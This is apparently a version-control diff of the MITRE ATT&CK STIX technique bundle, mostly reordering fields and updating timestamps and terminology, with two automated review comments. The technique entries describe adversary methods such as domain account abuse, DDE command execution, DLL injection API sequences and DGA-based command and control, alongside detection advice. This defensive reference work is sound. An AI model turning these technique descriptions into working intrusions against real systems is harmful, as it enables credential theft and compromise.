- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
+ "created": "2020-03-13T20:21:54.758Z",
+ "modified": "2020-03-23T21:08:40.063Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "persistence"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "privilege-escalation"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
+ "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
+ "name": "Domain Accounts",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -7893,34 +8275,6 @@
"source_name": "TechNet Audit Policy"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Domain Accounts",
- "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.",
- "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "defense-evasion"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "persistence"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "privilege-escalation"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "initial-access"
- }
- ],
- "modified": "2020-03-23T21:08:40.063Z",
- "created": "2020-03-13T20:21:54.758Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -7976,19 +8330,19 @@
],
"modified": "2020-03-25T20:51:30.829Z",
"created": "2020-02-11T19:05:02.399Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
"x_mitre_data_sources": [
"Authentication logs",
"API monitoring",
"DLL monitoring"
+ ],
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor for calls to OpenProcess that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton)\n\nConfigure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g. a user has an active login session but has not entered the building or does not have VPN access). ",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -8038,23 +8392,23 @@
"phase_name": "command-and-control"
}
],
- "modified": "2020-03-14T23:29:19.581Z",
+ "modified": "2020-06-20T20:53:20.398Z",
"created": "2020-03-14T23:29:19.581Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Matt Kelly, @breakersall"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)",
"x_mitre_data_sources": [
"SSL/TLS inspection",
"Packet capture"
],
- "x_mitre_detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blacklist or whitelist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_contributors": [
+ "Matt Kelly, @breakersall"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -8195,16 +8549,12 @@
],
"modified": "2020-03-12T14:45:22.784Z",
"created": "2020-03-10T17:44:59.787Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Ryan Benson, Exabeam",
- "Barry Shteiman, Exabeam",
- "Sylvain Gil, Exabeam"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)",
"x_mitre_data_sources": [
"DNS records",
"Netflow/Enclave netflow",
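Review bot: The `x_mitre_detection` string re-added in this hunk still reads `and the domains are not whitelisted (CDN, etc)`, while the same commit rewrites `blacklist or whitelist` to `blocklist or allowlist` in the domain-fronting object's detection text a few hunks earlier, so the bundle ends up with mixed terminology. Because the bundle `id` at the top of the diff was regenerated, this file is presumably a straight export of the upstream ATT&CK STIX data, in which case the wording belongs in the upstream source rather than a hand edit of this JSON. If it is corrected locally, `not allowlisted (CDN, etc)` keeps the meaning, and the object's `modified` timestamp should be bumped the way the domain-fronting object's was so STIX consumers can see that the object changed. The enclosing object starts before this hunk and its `x_mitre_data_sources` array continues past it.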
@@ -8212,12 +8562,16 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Ryan Benson, Exabeam",
+ "Barry Shteiman, Exabeam",
+ "Sylvain Gil, Exabeam"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -8243,31 +8597,33 @@
],
"modified": "2020-03-12T19:07:53.043Z",
"created": "2020-02-21T21:15:06.561Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"Process command-line parameters"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
- "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0",
- "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
- "name": "Domain Trust Discovery",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2019-02-14T16:15:05.974Z",
+ "modified": "2020-03-26T16:13:21.085Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
"external_references": [
{
"source_name": "mitre-attack",
@@ -8300,15 +8656,13 @@
"description": "Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019."
}
],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-26T16:13:21.085Z",
- "created": "2019-02-14T16:15:05.974Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Domain Trust Discovery",
+ "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)",
+ "id": "attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0",
"x_mitre_version": "1.1",
"x_mitre_permissions_required": [
"User"
@@ -8365,7 +8719,21 @@
],
"modified": "2020-03-29T23:48:15.056Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
+ "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS",
+ "SaaS"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
"x_mitre_data_sources": [
"Packet capture",
"Network device logs",
@@ -8374,21 +8742,7 @@
"Network intrusion detection system",
"SSL/TLS inspection"
],
- "x_mitre_detection": "Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.\n\nNetwork intrusion detection systems, sometimes with SSL/TLS MITM inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.\n\nDetecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS",
- "SaaS"
- ],
- "x_mitre_contributors": [
- "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)",
- "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -8465,20 +8819,20 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-27T15:32:06.115Z",
+ "modified": "2020-06-20T22:06:47.115Z",
"created": "2020-03-16T15:23:30.896Z",
- "x_mitre_defense_bypassed": [
- "Process whitelisting"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_detection": "Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. ",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_detection": "Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. ",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_defense_bypassed": [
+ "Application control"
]
},
{
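Review bot: The `x_mitre_defense_bypassed` entry changes from `"Process whitelisting"` to `"Application control"`, which is an enumerated value rather than free text, so any Atomic Red Team script, filter or mapping that matches on the old string will silently stop matching this object; the same substitution appears later in the diff in what looks like the Dynamic-link Library Injection object (`"Application control", "Anti-virus"`). The `modified` timestamp is bumped here, which is correct for consumers that track STIX object revisions; `x_mitre_version` stays at `"1.0"`, presumably because upstream treats this as a wording revision. A grep of the repository's own scripts for the old value before merging would confirm nothing keys on it.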
@@ -8537,6 +8891,22 @@
"created": "2018-01-16T16:13:52.465Z"
},
{
+ "created": "2020-02-12T14:10:50.699Z",
+ "modified": "2020-03-28T19:32:56.572Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).",
+ "name": "Dynamic Data Exchange",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -8584,22 +8954,6 @@
"source_name": "NVisio Labs DDE Detection Oct 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dynamic Data Exchange",
- "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).",
- "id": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T19:32:56.572Z",
- "created": "2020-02-12T14:10:50.699Z",
"x_mitre_platforms": [
"Windows"
],
@@ -8616,6 +8970,22 @@
]
},
{
+ "created": "2020-03-10T17:28:11.747Z",
+ "modified": "2020-03-27T20:54:28.560Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
+ "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
+ "name": "Dynamic Resolution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -8643,22 +9013,6 @@
"description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dynamic Resolution",
- "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)",
- "id": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-27T20:54:28.560Z",
- "created": "2020-03-10T17:28:11.747Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -8680,6 +9034,13 @@
]
},
{
+ "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
+ "name": "Dynamic-link Library Injection",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -8697,13 +9058,6 @@
"source_name": "Endgame HuntingNMemory June 2017"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Dynamic-link Library Injection",
- "description": "Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process. \n\nDLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread (which calls the LoadLibrary API responsible for loading the DLL). (Citation: Endgame Process Injection July 2017) \n\nVariations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of LoadLibrary ).(Citation: Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July 2017) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process. ",
- "id": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -8715,7 +9069,7 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-02-21T22:32:05.210Z",
+ "modified": "2020-06-20T22:17:59.148Z",
"created": "2020-01-14T01:26:08.145Z",
"x_mitre_platforms": [
"Windows"
@@ -8733,7 +9087,7 @@
"API monitoring"
],
"x_mitre_defense_bypassed": [
- "Process whitelisting",
+ "Application control",
"Anti-virus"
]
},
@@ -8820,28 +9174,28 @@
],
"modified": "2020-03-27T12:04:37.823Z",
"created": "2020-01-30T14:40:20.187Z",
- "x_mitre_platforms": [
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_effective_permissions": [
+ "root"
],
- "x_mitre_contributors": [
- "Jimmy Astle, @AstleJimmy, Carbon Black",
- "Erika Noerenberg, @gutterchurl, Carbon Black"
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Consider monitoring for /usr/libexec/security_authtrampoline executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
